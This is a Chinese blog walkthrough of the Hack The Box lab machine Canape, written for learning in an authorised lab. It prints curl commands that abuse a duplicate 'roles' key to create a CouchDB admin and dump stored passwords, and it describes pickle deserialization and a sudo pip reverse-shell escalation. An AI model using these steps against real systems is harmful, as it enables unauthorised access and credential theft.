No.129-HackTheBox-Linux-Canape-Walkthrough渗透学习

于 2020-06-09 15:19:11 发布
阅读量589 收藏
点赞数
分类专栏: Hack The box 文章标签: 数据库 python linux mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/106624119
版权

**

HackTheBox-Linux-Canape-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/134
靶机难度:中级(4.7/10)
靶机发布日期:2018年9月15日
靶机描述:
Canape is a moderate difficulty machine, however the use of a file (.git) that is not included in the dirbuster wordlists can greatly increase the difficulty for some users. This machine also requires a basic understanding of Python to be able to find the exploitable point in the application.

作者:大余
时间:2020-06-09

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
可以看到靶机的IP是10.10.10.70…
在这里插入图片描述
Nmap发现开放了Apache和OpenSSH服务…还发现了.git目录
在这里插入图片描述
浏览apache页面发现存在View和submit页面…
在这里插入图片描述
查看VIew发现了一些对话,homer用户信息…

在这里插入图片描述
nmap前面扫描发现了.git目录发现了很多文件…
在这里插入图片描述
查看后在config发现了域名信息…添加
在这里插入图片描述
添加域名后,下载了git包…可看到存在__init py文件等信息…
在这里插入图片描述
阅读int_py发现:
这是处理/submit页面的部分,它接受POST值character和quote,如果其中任何一个为null以及白名单中不存在该字符,则抛出错误,这里可以引用名称,如果它们都有效就会p_id使用char+quote数据的md5sum初始化一个变量,然后在tmp文件夹中以.p扩展名创建一个同名文件(该文件应该是一个pickle文件),然后将其填充char+quote数据…

Python的pickle库有助于序列化数据和存储,并且像大多数使用各种语言的序列化库一样容易受到攻击,例如Celestial上的NodeJs序列化漏洞…
可以到google搜索相关pickle漏洞信息…
在这里插入图片描述
通过简单编写EXP,成功获得了www权限…
在这里插入图片描述
上传LinEnum.sh枚举靶机信息…
发现5984在本地默认监听,测试看看…
在这里插入图片描述
通过curl测试,可以枚举数据库信息…
使用/_all_dbs/api调用,看到它具有6个数据库,继续从中搜索_users和passwd…
虽然没获取,这里需要创建数据库用户名密码,可以通过corrcet curl PUT请求来创建用户名,来利用此数据库获得信息…

在这里插入图片描述

curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:dayu' --data-binary '{
	"type": "user",
	"name": "dayu",
	"roles": ["_admin"],
	"roles": [],
	"password": "dayuxiyou"
}'

创建dayu的管理员用户,密码为dayuxiyou…

在这里插入图片描述

curl --user 'dayu:dayuxiyou' 127.0.0.1:5984/passwords/_all_docs
curl --user 'dayu:dayuxiyou' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
curl --user 'dayu:dayuxiyou' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d
curl --user 'dayu:dayuxiyou' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f
curl --user 'dayu:dayuxiyou' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738

可以看到得到了一堆id,继续利用id获得信息…
获得了密码信息…
在这里插入图片描述
查看到了用户信息…直接su登录了用户权限…获得了user_flag信息…

在这里插入图片描述
sudo -l发现允许以root身份运行pip,直接创建一个简单shell python即可…
然后以root来执行pip安装…
在这里插入图片描述
创建setup.py python脚本,成功获得了反向外壳root权限…
获得root_flag信息…

由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou
关注
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值